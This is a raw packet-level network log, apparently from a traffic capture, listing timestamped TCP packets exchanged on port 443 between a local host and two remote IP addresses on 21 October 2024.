Oct 21, 2024 17:05:19.066972017 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.067017078 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.067023039 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.067043066 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.067493916 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.067503929 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.067564011 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.067570925 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.067579031 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.115361929 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.139194012 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139216900 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139261961 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139267921 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.139278889 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139317989 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.139352083 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139373064 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139413118 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139416933 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.139426947 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139461994 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.139786005 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139838934 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139859915 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.139866114 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.139889002 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.139910936 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.139949083 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.140218973 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.140258074 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.140285015 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.140291929 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.140325069 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.140456915 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.140526056 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.140532970 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.140589952 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.140595913 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.140641928 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.141196012 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.141237020 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.141251087 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.141283989 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.141311884 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.141343117 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.141453028 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.141541958 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.141583920 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.141596079 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.141614914 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.141642094 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.141904116 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.141993999 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.142000914 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142050028 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.142055988 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142093897 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.142127037 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142172098 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142190933 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.142198086 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142227888 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.142247915 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.142290115 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142379999 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142422915 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142436981 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.142451048 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.142482996 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.193480968 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.193487883 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.204766035 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.204839945 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.204849005 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.204874992 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.204924107 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.205185890 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205255032 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.205262899 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205336094 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.205348969 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205399990 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.205437899 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205482006 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205504894 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.205512047 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205544949 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.205563068 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.205749989 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205837965 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205883026 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205908060 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.205914974 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.205946922 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.206058979 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.206113100 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.206135988 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.206142902 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.206175089 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.206500053 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.206554890 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.206569910 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.206576109 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.206623077 CEST  49764  443    192.168.2.6     52.217.161.161
                                                                                            Oct 21, 2024 17:05:19.206666946 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.206717014 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.206756115 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.206798077 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.206831932 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.206837893 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.206864119 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.206928968 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.206934929 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.206994057 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.207045078 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.207072020 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.207078934 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.207108021 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.220582962 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.220622063 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.220649004 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.220658064 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.220717907 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.220834970 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.220860958 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.220901012 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.220907927 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.220912933 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.220956087 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.221153021 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.221178055 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.221213102 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.221220016 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.221234083 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.221256971 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.221520901 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.221538067 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.221566916 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.221586943 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.221595049 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.221600056 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.221967936 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.221987009 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222018003 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222023964 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222060919 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222168922 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222197056 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222222090 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222229004 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222254992 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222282887 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222388983 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222410917 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222439051 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222445011 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222474098 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222521067 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222524881 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222645044 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222681046 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222696066 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222706079 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222742081 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.222935915 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222953081 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.222987890 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223001003 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.223009109 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223050117 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.223189116 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223208904 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223243952 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.223248959 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223279953 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.223306894 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.223310947 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223351002 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223371029 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223396063 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.223402977 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.223433018 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.224114895 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.224154949 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.224181890 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.224189043 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.224198103 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.224242926 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.224349022 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.224365950 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.224412918 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.224421024 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.224457979 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.285058022 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.285176039 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.285223961 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.285258055 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.285267115 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.285311937 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.285582066 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.285623074 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.285649061 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.285657883 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.285701036 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.285722017 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.285758018 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.286005020 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286051035 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286076069 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.286082983 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286108971 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.286137104 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.286144018 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286375046 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286422014 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286448956 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.286458015 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286484003 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.286837101 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286886930 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.286907911 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.286935091 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287090063 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287126064 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.287148952 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287154913 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.287247896 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.287291050 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287395000 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287434101 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287455082 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.287461996 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287487984 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.287517071 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.287575960 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287902117 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287940979 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.287965059 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.287972927 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.288012981 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.288398981 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.288456917 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.288466930 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.288472891 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.288516998 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.288795948 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.288858891 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.288866997 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.288914919 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.288933992 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289050102 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289226055 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289268970 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289311886 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289319038 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289340019 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289442062 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289448977 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289486885 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289534092 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289550066 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289557934 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289592028 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289673090 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289724112 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289762020 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289802074 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289818048 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289825916 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.289854050 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289885044 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.289935112 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.290026903 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.290065050 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.290087938 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.290096045 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.370769978 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.370785952 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.370810986 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.370862007 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.371455908 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:21.830734015 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:21.830773115 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:21.831007957 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:21.831422091 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:21.831446886 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.584861994 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.584952116 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.586935043 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.586951971 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.587389946 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.588836908 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.631330967 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.803719044 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.803903103 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.803989887 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.804003000 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.804022074 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.804143906 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.804147959 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.804172993 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.804235935 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.804264069 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.804414034 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.804481030 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.804496050 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.849771023 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.849797964 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.885514021 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.885556936 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.885591984 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.885611057 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.885658026 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.885699034 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.885711908 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.885719061 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.885756969 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.885756969 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.886106968 CEST49789443192.168.2.6185.199.108.133
                                                                                            Oct 21, 2024 17:05:22.886112928 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.886276960 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.886315107 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.886348009 CEST44349789185.199.108.133192.168.2.6
                                                                                            Oct 21, 2024 17:05:22.886353970 CEST49789443192.168.2.6185.199.108.133
